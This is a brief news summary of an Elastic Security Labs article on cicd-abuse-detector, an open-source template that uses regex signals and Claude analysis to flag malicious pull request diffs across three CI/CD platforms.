ELASTIC Security Labs outlines how an open-source, drop-in CI template called cicd-abuse-detector can help catch abuse across GitHub Actions, GitLab CI, and Azure DevOps pipelines. Published on 29 April 2026 by Mika Ayenson, PhD, the piece explains that attackers in 2025–2026 shifted from targeting production servers to exploiting automation to exfiltrate secrets and pivot to cloud and production environments.
The detector uses 50+ regex signals plus metadata, feeding the full diffs to Claude via the Claude Code CLI for structured threat analysis, and requires no Python or complex dependencies. The project ships with 19 malicious and four benign example diffs, and has been validated against real incidents such as Nord Stream, ArtiPACKED and HackerBot-Claw, among others.
It works across three platforms and aims to surface patterns at the pull request stage, enabling correlated alerts and cross-platform investigations through a unified data stream.